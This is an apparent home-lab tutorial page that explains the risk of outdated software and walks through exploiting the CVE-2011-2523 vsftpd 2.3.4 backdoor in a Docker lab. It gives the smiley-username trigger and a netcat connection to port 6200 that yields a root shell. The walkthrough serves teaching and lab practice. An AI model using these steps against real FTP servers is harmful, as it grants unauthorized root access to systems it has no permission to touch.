Skip to content

Exploit Outdated Software (CVE-2011-2523)

Prerequisites

  1. VirtualBox or VMware Workstation Pro Installed.
  2. Virtual Machine [project-x-corp-svr] is configured with Docker.
  3. Docker Container [project-x-corp-svr-ftp-svr] setup and configured.
  4. Virtual Machine [project-x-attacker] is turned on.

Network Topology

Base Layout
(Click to zoom)

Likeliness Meter

Base Layout
(Click to zoom)

High: Maybe not CVE-2011-2523 (too old of a vulnerability đŸ˜‚), but exploitation of outdated software is very likely. If and when systems and services become outdated, attackers will probe online forums, databases, and exploit databases to write or source payloads.

Exploit Outdated Software Overview

There's a reason why you commonly hear, "Keep your systems up to date."

It's because outdated software often gets patched in response to bugs and security findings, which can be exploited to gain access to accounts and data.

Outdated software refers to applications, services, or operating systems that have not been patched or updated to fix known vulnerabilities. These vulnerabilities are often publicly documented, making them prime targets for exploitation.

Attackers regularly scan networks for known vulnerable versions and use exploit code—often automated—to gain unauthorized access, escalate privileges, or execute arbitrary code.

So don't be lazy. It's easy to get behind.

How is Exploitation accomplished?

Exploitation occurs through a series of steps.

Attackers will often deploy reconnaissance to identify the software version using scanning tools, then match the version to CVE databases to see if there are known vulnerabilities against these versions, and finally find and execute the vulnerability through exploit code.

Impact

Exploiting outdated software leads to:

  • Unauthorized system access

  • Data breach or leakage

  • Lateral movement across network

  • Malware installation or persistence

  • Service disruption or denial of service

Exploit CVE-2011-2523

CVE-2011-2523 was a backdoor vulnerability in a maliciously modified version of vsftpd 2.3.4, which was not an official release from the vsftpd project.

This backdoored version was uploaded to a third-party download mirror and contained code allowing an attacker to gain a shell on the server.

This exploit is super easy.

Supply the :) strings in the username when connecting. Supply a random password.

Using the netcat, connect using 6200.

Container

Make sure the ftp-svr container is running:

docker start ftp-svr.

Login with the bash shell.

docker exec -it ftp-svr /bin/bash.

Base Layout
(Click to zoom)

This screenshot shows vsftp as the docker container name, use ftp-svr

Navigate to the cd vsftpd-2.3.4 directory.

Run the vsftp binary with:

vsftp

Base Layout
(Click to zoom)

[project-x-attacker]

Open a new terminal session.

The ftp command line utility comes standard with most Linux distributions. This can be used to connect to FTP servers.

ftp 10.0.0.8.

Now log in with any username, make sure to add the :) string.

Supply any random password.

Base Layout
(Click to zoom)

Open a new terminal tab or session.

Type in the following:

nc 10.0.0.8 6200.

Now if you perform a whoami. You will see you are root.

Base Layout
(Click to zoom)

Success! We have backdoored this version of vsftp.